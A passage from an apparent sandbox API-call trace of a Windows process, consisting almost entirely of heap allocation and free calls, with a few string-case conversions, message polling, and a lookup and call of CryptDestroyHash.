(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0258.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0258.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaad8 [0258.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9a0 [0258.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0258.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7a8 [0258.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3a0 [0258.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0258.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa430 [0258.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4d8 [0258.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0258.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0258.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa940 [0258.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0258.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa838 [0258.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0258.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0258.576] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0258.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0258.576] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0258.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0258.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0258.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.577] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.577] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0258.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.577] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0258.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0258.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0258.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0258.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0258.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0258.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0258.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0258.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0258.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0258.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0258.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0258.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0258.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0258.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0258.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0258.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0258.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0258.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466db0 [0258.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466db0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0258.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.581] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0258.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0258.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0258.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.581] CryptDestroyHash (hHash=0xaa57a0) returned 1 [0258.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0258.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0258.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0258.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0258.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0258.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0258.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0258.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.584] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0258.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0258.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0258.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0258.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0258.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0258.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0258.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0258.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0258.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 